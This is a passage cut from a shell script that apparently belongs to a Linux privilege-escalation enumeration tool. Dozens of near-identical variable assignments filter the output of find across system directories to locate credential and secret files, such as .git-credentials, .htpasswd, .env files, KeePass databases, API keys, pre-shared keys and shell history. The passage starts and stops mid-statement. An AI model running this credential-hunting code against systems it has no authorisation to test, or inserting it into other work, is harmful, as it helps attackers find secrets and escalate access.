"$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) - PSTORAGE_FASTCGI=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) - PSTORAGE_FAT_FREE=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "fat\.config$" | sort | uniq | head -n 70) - PSTORAGE_SHODAN=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "api_key$" | sort | uniq | head -n 70) - PSTORAGE_CONCOURSE=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}etc" | grep -E "\.flyrc$|concourse-auth$|concourse-keys$" | sort | uniq | head -n 70) - PSTORAGE_BOTO=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.boto$" | sort | uniq | head -n 70) - PSTORAGE_SNMP=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_PYPIRC=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.pypirc$" | sort | uniq | head -n 70) - PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "postfix$" | sort | uniq | head -n 70) - PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) - PSTORAGE_HISTORY=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E ".*_history.*$" | sort | uniq | head -n 70) - PSTORAGE_HTTP_CONF=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_HTPASSWD=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) - PSTORAGE_LDAPRC=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) - PSTORAGE_ENV=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E 'example' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.env.*$" | sort | uniq | head -n 70) - PSTORAGE_MSMTPRC=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) - PSTORAGE_INFLUXDB=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70) - PSTORAGE_ZABBIX=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70) - PSTORAGE_GITHUB=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) - PSTORAGE_SVN=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.svn$" | sort | uniq | head -n 70) - PSTORAGE_KEEPASS=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) - PSTORAGE_PRE_SHARED_KEYS=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E ".*\.psk$" | sort | uniq | head -n 70) - PSTORAGE_PASS_STORE_DIRECTORIES=$(echo -e 